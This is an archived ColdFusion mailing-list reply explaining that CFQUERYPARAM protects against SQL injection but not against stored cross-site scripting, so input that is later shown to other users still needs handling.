> In the past I've used the CodeCleaner custom tag to scrub > form inputs. Recently I've expanded my use of CFQUERYPARAM > to include values in SQL UPDATE and INSERT statements, > rather than just for the WHERE clause. > > Does cfqueryparam eliminate the need to scrub the code? My > gut feeling is 'yes' for cfsqltype=cf_sql_numeric and an > emphatic 'NO' for cfsqltype=cf_sql_varchar. Any confirmation/ > correction would be appreciated.
The CFQUERYPARAM tag will prevent any SQL injection attacks, unless you explicitly evaluate SQL strings in SQL within your SQL batch or stored procedure (which is a pretty rare thing to do). It may prevent SQL injection attacks even in those cases; I haven't tested that, myself. The CFQUERYPARAM tag won't prevent the injection of non-SQL code (JavaScript, CF, etc) within your SQL statements, though, and if you're going to SELECT the stuff in the database to build a page for someone else, that other code may be an issue. This is the basic underlying idea behind "cross-site scripting" exploits, in which a malicious user inputs code that will later be executed by another user. It's unlikely that CFML code will be useful for a cross-site scripting exploit, since it's relatively difficult to take strings from a database and evaluate them as CFML code, but JavaScript is used for this sort of thing all the time. Note that even HTML can be used for an exploit of this sort - a META refresh tag, for example. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ voice: (202) 797-5496 fax: (202) 797-5444 ______________________________________________________________________ Signup for the Fusion Authority news alert and keep up with the latest news in ColdFusion and related topics. http://www.fusionauthority.com/signup.cfm FAQ: http://www.thenetprofits.co.uk/coldfusion/faq Archives: http://www.mail-archive.com/[email protected]/ Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists
